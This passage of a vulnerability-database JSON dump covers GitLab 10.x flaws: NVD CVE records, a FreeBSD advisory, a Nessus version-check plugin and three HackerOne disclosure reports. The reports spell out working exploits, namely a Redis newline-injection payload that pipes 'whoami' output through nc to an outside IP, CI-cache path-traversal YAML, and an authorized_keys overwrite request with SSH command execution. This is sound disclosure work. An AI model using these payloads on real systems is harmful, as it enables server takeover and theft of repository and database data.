system_hook_push queue through web hook component resulting in remote code execution.", "modified": "2019-10-09T23:21:00", "id": "CVE-2017-0916", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0916", "published": "2018-03-21T20:29:00", "title": "CVE-2017-0916", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-10T12:21:41", "bulletinFamily": "NVD", "description": "Gitlab Community Edition version 10.2.4 is vulnerable to a lack of input validation in the GitlabProjectsImportService resulting in remote code execution.", "modified": "2019-10-09T23:21:00", "id": "CVE-2017-0915", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0915", "published": "2018-03-21T20:29:00", "title": "CVE-2017-0915", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-10T12:21:41", "bulletinFamily": "NVD", "description": "Gitlab Community Edition version 10.2.4 is vulnerable to lack of input validation in the CI job component resulting in persistent cross site scripting.", "modified": "2019-10-09T23:21:00", "id": "CVE-2017-0917", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0917", "published": "2018-03-21T20:29:00", "title": "CVE-2017-0917", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-10-10T12:21:41", "bulletinFamily": "NVD", "description": "Gitlab Community Edition version 10.3 is vulnerable to a path traversal issue in the GitLab CI runner component resulting in remote code execution.", "modified": "2019-10-09T23:21:00", "id": "CVE-2017-0918", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0918", "published": "2018-03-21T20:29:00", "title": "CVE-2017-0918", "type": "cve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-10-10T12:21:41", "bulletinFamily": "NVD", "description": "Gitlab Community Edition version 10.3 is vulnerable to an improper authorization issue in the Oauth sign-in component resulting in unauthorized user login.", "modified": "2019-10-09T23:21:00", "id": "CVE-2017-0926", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0926", "published": "2018-03-21T20:29:00", "title": "CVE-2017-0926", "type": "cve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-10-10T12:28:55", "bulletinFamily": "NVD", "description": "Gitlab Community and Enterprise Editions version 10.3.3 is vulnerable to an Insecure Temporary File in the project import component resulting remote code execution.", "modified": "2019-10-09T23:40:00", "id": "CVE-2018-3710", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-3710", "published": "2018-03-21T20:29:00", "title": "CVE-2018-3710", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:03", "bulletinFamily": "unix", "description": "\nGitLab developers report:\n\nToday we are releasing versions 10.3.4, 10.2.6, and 10.1.6 for\n\t GitLab Community Edition (CE) and Enterprise Edition (EE).\nThese versions contain a number of important security fixes,\n\t including two that prevent remote code execution, and we strongly\n\t recommend that all GitLab installations be upgraded to one of these\n\t versions immediately.\n\n", "modified": "2018-01-16T00:00:00", "published": "2018-01-16T00:00:00", "id": "65FAB89F-2231-46DB-8541-978F4E87F32A", "href": "https://vuxml.freebsd.org/freebsd/65fab89f-2231-46db-8541-978f4e87f32a.html", "title": "gitlab -- Remote code execution on project import", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-12-13T07:29:59", "bulletinFamily": "scanner", "description": "GitLab developers report :\n\nToday we are releasing versions 10.3.4, 10.2.6, and 10.1.6 for GitLab\nCommunity Edition (CE) and Enterprise Edition (EE).\n\nThese versions contain a number of important security fixes, including\ntwo that prevent remote code execution, and we strongly recommend that\nall GitLab installations be upgraded to one of these versions\nimmediately.", "modified": "2019-12-02T00:00:00", "id": "FREEBSD_PKG_65FAB89F223146DB8541978F4E87F32A.NASL", "href": "https://www.tenable.com/plugins/nessus/106115", "published": "2018-01-18T00:00:00", "title": "FreeBSD : gitlab -- Remote code execution on project import (65fab89f-2231-46db-8541-978f4e87f32a)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106115);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2018/11/10 11:49:47\");\n\n script_cve_id(\"CVE-2017-0915\", \"CVE-2018-3710\");\n\n script_name(english:\"FreeBSD : gitlab -- Remote code execution on project import (65fab89f-2231-46db-8541-978f4e87f32a)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"GitLab developers report :\n\nToday we are releasing versions 10.3.4, 10.2.6, and 10.1.6 for GitLab\nCommunity Edition (CE) and Enterprise Edition (EE).\n\nThese versions contain a number of important security fixes, including\ntwo that prevent remote code execution, and we strongly recommend that\nall GitLab installations be upgraded to one of these versions\nimmediately.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://about.gitlab.com/2018/01/16/gitlab-10-dot-3-dot-4-released/\"\n );\n # https://vuxml.freebsd.org/freebsd/65fab89f-2231-46db-8541-978f4e87f32a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f6ad525c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:gitlab\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"gitlab<10.1.6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2018-08-31T00:39:16", "bulletinFamily": "bugbounty", "bounty": 750.0, "description": "The secret token field of a webhook is vulnerable to a new line injection, allowing an attacker to inject non-HTTP commands in a TCP stream. When a GitLab instance is configured with an external Redis instance, e.g. on `127.0.0.1:6379`, it may result in arbitrary code execution on a Sidekiq worker by abusing a blind Server-Side Request Forgery (SSRF) vulnerability in the webhook integration and the new line injection. One of my other reports regarding these SSRFs, #131190, is still open and has been for more than a year. However, because this is a service I haven't reported the SSRF in and chaining it with the new line injection increases the severity of the vulnerability, I decided to report it. To reproduce, start by signing in to the GitLab instance and creating a new project.\n\nTo reproduce the RCE, a Redis server has to be running on port 6379. Follow the GitLab documentation to set up the Redis server and reconfigure GitLab by running `gitlab-ctl reconfigure`. When that's done, continue to go to the Integrations section of the created project. Intercept your network traffic before continuing. Now, enter `http://127.0.0.1:6379/` as the webhook endpoint and `A` as the secret token. When the request is submitted, a request similar to the one below is submitted:\n\n**Request**\n```\nPOST /root/test/hooks HTTP/1.1\nHost: gitlab-instance\n...\n----------1282688597\nContent-Disposition: form-data; name=\"hook[url]\"\n\nhttp://127.0.0.1:6379/\n----------1282688597\nContent-Disposition: form-data; name=\"hook[token]\"\n\nA\n...\n```\n\nIn the request above I changed the body encoding to make it easier to inject the payload. Now, replace the `hook[token]` field with the payload below.\n\n**Payload**\n```\nA\n multi\n sadd resque:gitlab:queues system_hook_push\n lpush resque:gitlab:queue:system_hook_push \"{\\\"class\\\":\\\"GitlabShellWorker\\\",\\\"args\\\":[\\\"class_eval\\\",\\\"open(\\'|whoami | nc 192.241.233.143 80\\').read\\\"],\\\"retry\\\":3,\\\"queue\\\":\\\"system_hook_push\\\",\\\"jid\\\":\\\"ad52abc5641173e217eb2e52\\\",\\\"created_at\\\":1513714403.8122594,\\\"enqueued_at\\\":1513714403.8129568}\"\n exec\n```\n\nThen, when the integration persisted, click the `Test` button next to the newly created integration. Here's what happens next: a `POST` request will be submitted to `127.0.0.1`, port `6379` (Redis). Redis is pretty easy on errors, so it'll simply ignore the first couple lines of the HTTP request. Then, a couple headers further down, it is including the `X-GitLab-Token` that is vulnerable to the new line injection. Here's the entire request that is posted:\n\n**Injected request**\n```\nPOST / HTTP/1.1\nContent-Type: application/json\nX-Gitlab-Event: Push Hook\nX-Gitlab-Token: A\n multi\n sadd resque:gitlab:queues system_hook_push\n lpush resque:gitlab:queue:system_hook_push \"{\\\"class\\\":\\\"GitlabShellWorker\\\",\\\"args\\\":[\\\"class_eval\\\",\\\"open(\\'|whoami | nc 192.241.233.143 80\\').read\\\"],\\\"retry\\\":3,\\\"queue\\\":\\\"system_hook_push\\\",\\\"jid\\\":\\\"ad52abc5641173e217eb2e52\\\",\\\"created_at\\\":1513714403.8122594,\\\"enqueued_at\\\":1513714403.8129568}\"\n exec\n exec\nConnection: close\nHost: 192.241.233.143\nContent-Length: 2495\n\n{\"object_kind\":\"push\",\"ev<...>\n```\n\nWhen this is submitted to Redis, a new job will be shifted on the `system_hook_push` command. In order to evaluate Ruby code, I needed a Ruby class that'd implement the `perform` method that would allow me to execute a command or Ruby. The `GitlabShellWorker` was exactly what I was looking for:\n\n**GitlabShellWorker**\n```ruby\nclass GitlabShellWorker\n include ApplicationWorker\n include Gitlab::ShellAdapter\n\n def perform(action, *arg)\n gitlab_shell.__send__(action, *arg) # rubocop:disable GitlabSecurity/PublicSend\n end\nend\n```\n\nAs can be seen in the payload, the `GitlabShellWorker` is called with the arguments `class_eval` and the following Ruby code:\n\n```\nopen('|whoami | nc 192.241.233.143 80').read\n```\n\nBecause the Ruby is evaluated on a Sidekiq server, we need to exfiltrate the output of a command through `nc` or a similar tool. In this example, my server is listening on port 80 for connections. When the payload fires, it captures the output of the `whoami` command:\n\n```\n$ nc -l -n -vv -p 80\nListening on [0.0.0.0] (family 0, port 80)\nConnection from [104.236.178.103] port 80 [tcp/*] accepted (family 2, sport 42874)\ngit\n```\n\nBesides the blind SSRF, the underlying vulnerability is the new line injection in the secret token. Fixing the new line injection seems mitigate the immediate risk for an RCE, but I'd encourage you to reprioritize the fix for the SSRF vulnerabilities in the services (reported by me previously). Let me know if you have any questions.\n\n## Impact\n\nAn attacker can execute arbitrary system commands on the server, which exposes access to all git repositories, database, and potentially other secrets that may be used to escalate this further.", "modified": "2018-04-27T02:21:14", "published": "2017-12-19T21:08:22", "id": "H1:299473", "href": "https://hackerone.com/reports/299473", "type": "hackerone", "title": "GitLab: Evaluating Ruby code by injecting Rescue job on the system_hook_push queue through web hook", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:39:16", "bulletinFamily": "bugbounty", "bounty": 2000.0, "description": "The GitLab CI runner allows users to cache files and directories in between runs. These files are stored in a ZIP file and uploaded to a shared cache instance. In my testing, the files were uploaded to `runners-cache-4-internal.gitlab.com` and `runners-cache-3-internal.gitlab.com`, even for dedicated runners. It seems odd that dedicated runners use the same shared cache, but perhaps that was an intentional design decision. It could also be a vulnerability. I tried reaching the cache servers from a Docker instance itself, but wasn't able to (I tried from a reverse shell spawned from a Docker instance). There are multiple vulnerabilities (same root cause though) that can be chained to successfully poison the CI runner cache of another project.\n\n**Reading the cache of other projects**\nCreate a new project with a `.gitlab-ci.yml` file in it. The file should contain the following contents. By default, when a cache file is downloaded, it'll download the cache from http://runners-cache-4-internal.gitlab.com:444/runner/project/5024150/cache.\n\n**.gitlab-ci.yml**\n```\na:\n script:\n - ls -lashR\n cache:\n key: ../1/cache\n policy: pull\n paths:\n - .\n```\n\nTo read the cache, the attacker needs to know two things: a project ID (auto incremental) and a cache key. By default, the project ID will be prepended to download the cache. But because it's an HTTP request and there's no additional checks on the `key` input, a path traversal vulnerability can be exploited to move up a directory and select the cache from a different project. In this case, when it downloads the cache, it'll request http://runners-cache-4-internal.gitlab.com:444/runner/gitlab/project/1/cache instead of the project ID of the build.\n\n**Build output**\n```\n\u001b[0KRunning with gitlab-runner 10.3.0 (5cf5e19a)\n on docker-auto-scale (e11ae361)\n\u001b[0;m\u001b[0KUsing Docker executor with image ruby:2.1 ...\n\u001b[0;m\u001b[0KUsing docker image sha256:4eadb9b5cb46f487a71d05717762679404f7f6fdec1ba4fa96304de1db07dfef for predefined container...\n\u001b[0;m\u001b[0KPulling docker image ruby:2.1 ...\n\u001b[0;m\u001b[0KUsing docker image ruby:2.1 ID=sha256:223d1eaa9523fa64e78f5a92b701c9c11cbc507f0ff62246dbbacdae395ffea3 for build container...\n\u001b[0;msection_start:1514659811:prepare_script\n\u001b[0KRunning on runner-e11ae361-project-4989754-concurrent-0 via runner-e11ae361-srm-1514658950-a15d8859...\nsection_end:1514659812:prepare_script\n\u001b[0Ksection_start:1514659813:get_sources\n\u001b[0K\u001b[32;1mCloning repository...\u001b[0;m\nCloning into '/builds/jobertabma/build-test'...\n\u001b[32;1mChecking out e01918e5 as master...\u001b[0;m\n\u001b[32;1mSkipping Git submodules setup\u001b[0;m\nsection_end:1514659814:get_sources\n\u001b[0Ksection_start:1514659814:restore_cache\n\u001b[0K\u001b[32;1mChecking cache for ../13083/ruby-235-with-yarn...\u001b[0;m\nDownloading cache.zip from http://runners-cache-5-internal.gitlab.com:444/runner/project/13083/ruby-235-with-yarn\u001b[0;m \n\u001b[32;1mSuccessfully extracted cache\u001b[0;m\nsection_end:1514659844:restore_cache\n```\n\nThe cache key seems to be guessable pretty easily or even unused when no key is specified, since most will correlate with the step they're executed in. When I started looking at this, I had to specify which paths to download from the cache. This made exploitation more difficult. However, it (conveniently) allowed me to use `.` as path, extracting all files from the cache into the working directory. Running `ls -lashR` after that reveals the cache contents in the build output. Files can be read using `cat` or to store them as build artifacts through the `.gitlab-ci.yml`.\n\n**Writing the cache of other projects**\nNow that the attacker knows what files are stored in the cache, it can poison the cache with its own file contents. Create another CI YAML file with the following contents:\n\n**.gitlab-ci.yml**\n```\na:\n script:\n - echo 1 > file-to-poison\n cache:\n key: ../1/cache\n policy: push\n paths:\n - file-to-poison\n```\n\nThe attacker has to run a build, which will overwrite the `file-to-poison` file in the cache for project ID 1. Now, when the targeted project starts another CI run, the poisoned cache files will be downloaded and used in the CI run. For example, an attacker could poison `13083/ruby-235-with-yarn`, which would overwrite the Ruby 2.3.5 executable that is being used for GitLab CE CI runs. As you can imagine, someone could enumerate over other projects that use cached executables and overwrite them with their own code.\n\nThis has been tested against the latest version of GitLab.\n\n## Impact\n\nDepending on the files that are cached, this may allow an attacker to run arbitrary code on a victim's Docker instance running a CI run. This may expose confidential data, inject artifacts in a build pipeline to ship additional code, among other things.", "modified": "2018-04-27T02:21:50", "published": "2017-12-30T18:58:16", "id": "H1:301432", "href": "https://hackerone.com/reports/301432", "type": "hackerone", "title": "GitLab: GitLab CI runner can read and poison cache of all other projects", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:39:16", "bulletinFamily": "bugbounty", "bounty": 2000.0, "description": "The `Projects::GitlabProjectsImportService` contains a vulnerability that allows an attacker to write files to arbitrary directories on the server. This leads to an arbitrary command execution vulnerability by overwriting the `authorized_keys` file. To reproduce, sign in to a GitLab instance that has GitLab import enabled. This is enabled by default, so I'd assume that this vulnerability applies to most GitLab instances. I've installed my GitLab instance through Omnibus.\n\nNext up, intercept your network traffic and upload a GitLab import file. Observe the following request being made to the server:\n\n**Request**\n```\nPOST /import/gitlab_project HTTP/1.1\nHost: gitlab-instance\n...\n\n------WebKitFormBoundaryA0TxBpQRLhL4lJQN\nContent-Disposition: form-data; name=\"path\"\ntest\n------WebKitFormBoundaryA0TxBpQRLhL4lJQN\nContent-Disposition: form-data; name=\"namespace_id\"\n\n1\n------WebKitFormBoundaryA0TxBpQRLhL4lJQN\nContent-Disposition: form-data; name=\"file\"; filename=\"2017-12-17_02-20-093_root_test_export.tar.gz\"\nContent-Type: application/x-gzip\n\n<file data>\n```\n\nNow take a closer look at the code that is being executed when this endpoint is hit:\n\n**app/services/projects/gitlab_project_import_service.rb**\n```ruby\n# This service is an adapter used to for the GitLab Import feature, and\n# creating a project from a template.\n# The latter will under the hood just import an archive supplied by GitLab.\nmodule Projects\n class GitlabProjectsImportService\n # ...\n\n def execute\n FileUtils.mkdir_p(File.dirname(import_upload_path))\n FileUtils.copy_entry(file.path, import_upload_path)\n\n Gitlab::ImportExport::ProjectCreator.new(params[:namespace_id],\n current_user,\n import_upload_path,\n params[:path]).execute\n end\n\n # ...\n\n def tmp_filename\n \"#{SecureRandom.hex}_#{params[:path]}\"\n end\n end\nend\n```\n\nThe `import_upload_path` will take the unsanitized `params[:path]` and append it to the GitLab uploads directory. This means that directories can be traversed in the `path` parameter. Another observation is that the file contents of the `file` aren't verified. This means that it may contain any data at that point.\n\nMy first though was to abuse this vulnerability to exploit a second-order remote code execution by writing an ERB template to the Rails views directory. However, that didn't work because of the file permissions of the GitLab Rails directory. I started looking for other files. I noticed that the uploads directory was writable for the `git` user. I took a closer look at the `/var/opt/gitlab/` directory and noticed the `.ssh/authorized_keys` directory. This file was writable for the `git` user, and thus, could be overwritten. This file can specify a command when an SSH connection is made. Now, going back to the original HTTP request, here's the updated request to overwrite the file:\n\n```\nPOST /import/gitlab_project HTTP/1.1\nHost: gitlab-instance\n...\n\n------WebKitFormBoundaryA0TxBpQRLhL4lJQN\nContent-Disposition: form-data; name=\"path\"\n\nnew-test/../../../../../../../../../var/opt/gitlab/.ssh/authorized_keys\n------WebKitFormBoundaryA0TxBpQRLhL4lJQN\nContent-Disposition: form-data; name=\"namespace_id\"\n\n1\n------WebKitFormBoundaryA0TxBpQRLhL4lJQN\nContent-Disposition: form-data; name=\"file\"; filename=\"2017-12-17_02-20-093_root_test_export.tar.gz\"\nContent-Type: application/x-gzip\n\ncommand=\"ls -lash\",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCxc6GwCNoYCygtTXvoBpn1ACoF4hxhQviNa/0fm3LGGnEWLszswgw4QcaxXYiRumKjBv77eJT2/VbJylZX0uL6D/1/hubTmnp2A1QQJLk1rMvaUGlR8DeQpIcF1T61g3y4lEw5yhaaHRqRLiMpGammQhu0PO6PTDbKlGH+HxA0u8ku/L+lJXncNtpupw3qTDaAt8dgamKAU8RSZRyANK2BVYVj1W376OQFglHIeQW62LsNNgvr9Oe/Ze1YeQqvHO/lv0AeWYdLgjBJOiC5acBFexDBCr4odeSqkDPmKCMI28Mw28hC8fJIHh3vFqXjvlPtkuhDmdap4x+8gUxP77DWoMGw6LY8cuce+sSWY0teawMFW8Dm2R0Fr2iHzpCT8IpKgVHQ24BnmPGWjtWHxDX2DSzdE3GC6dWStVXud3iprgipM2SOxFkwHIISzLybjT1u/fK1sO4IW6E2T1cgSYQd7I2KhNJsgW57GljefD4cmhlwR39ZXZ1GtDCoUxtwZF3Qpr6XaSQ4nL71Wq+Y+v2TGeJzI9HXHRUSP2gZh/BI5kUdeUKkeylhLLouCqII5MlIlMmklXFOOPXoip/KCO36fYRZ1YAhxJ0J1JGX7ws4BnMMKHAHp+YOtRpAfGXcA+yEdMx50PRvXydqNeivfvDlY2JXRRIKUA03O9GoWmPLpQ==\n------WebKitFormBoundaryA0TxBpQRLhL4lJQN--\n```\n\nIn the request, replace my public SSH key with your own and replace `ls -lash` with whatever command you want to execute. When the request is sent to the server, a 302 Found will be returned. This is caused by a validation error that is returned because the project name contains invalid characters. Because the files aren't cleaned up, our exploit persists.\n\n**Response**\n```\nHTTP/1.1 302 Found\nServer: nginx\n...\nLocation: http:/gitlab-instance/import/gitlab_project/new?namespace_id=1&path=new-test/../../../../../../../../../var/opt/gitlab/.ssh/authorized_keys\n...\n```\n\nNow, to execute the command, run `ssh git@gitlab-instance`:\n\n```\n$ ssh git@gitlab-instance\nPTY allocation request failed on channel 0\ntotal 84K\n4.0K drwxr-xr-x 18 root root 4.0K Dec 15 04:33 .\n4.0K drwxr-xr-x 3 root root 4.0K Dec 15 04:32 ..\n4.0K drwx------ 2 git root 4.0K Dec 15 04:32 backups\n4.0K -rw------- 1 root root 38 Dec 15 04:33 bootstrapped\n4.0K drwx------ 2 git root 4.0K Dec 17 02:28 gitaly\n4.0K -rw-r--r-- 1 git git 292 Dec 15 04:32 .gitconfig\n4.0K drwx------ 3 git root 4.0K Dec 15 04:32 git-data\n4.0K drwxr-xr-x 3 git root 4.0K Dec 15 04:32 gitlab-ci\n4.0K drwxr-xr-x 2 git root 4.0K Dec 15 04:33 gitlab-monitor\n4.0K drwxr-xr-x 9 git root 4.0K Dec 15 04:33 gitlab-rails\n4.0K drwx------ 2 git root 4.0K Dec 15 04:32 gitlab-shell\n4.0K drwxr-x--- 2 git gitlab-www 4.0K Dec 17 02:28 gitlab-workhorse\n4.0K drwx------ 3 root root 4.0K Dec 17 02:38 logrotate\n4.0K drwxr-x--- 9 root gitlab-www 4.0K Dec 17 02:28 nginx\n4.0K drwxr-xr-x 3 root root 4.0K Dec 15 04:33 node-exporter\n4.0K drwx------ 2 gitlab-psql root 4.0K Dec 15 04:34 postgres-exporter\n4.0K drwxr-xr-x 3 gitlab-psql root 4.0K Dec 17 02:28 postgresql\n4.0K drwxr-x--- 3 gitlab-prometheus root 4.0K Dec 15 04:33 prometheus\n4.0K drwxr-x--- 2 gitlab-redis git 4.0K Dec 17 02:43 redis\n4.0K drwx------ 2 git git 4.0K Dec 17 02:44 .ssh\n4.0K -rw-r--r-- 1 root root 40 Dec 15 04:32 trusted-certs-directory-hash\n```\n\nThis has been tested against GitLab 10.2.4 (the latest version, also used on gitlab.com).\n\n## Impact\n\nAn attacker can execute arbitrary system commands on the server, which exposes access to all git repositories, database, and potentially other secrets that may be used to escalate this further.", "modified": "2018-04-27T02:20:49", "published": "2017-12-17T03:11:21", "id": "H1:298873", "href": "https://hackerone.com/reports/298873", "type": "hackerone", "title": "GitLab: Command injection by overwriting authorized_keys file through GitLab import", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}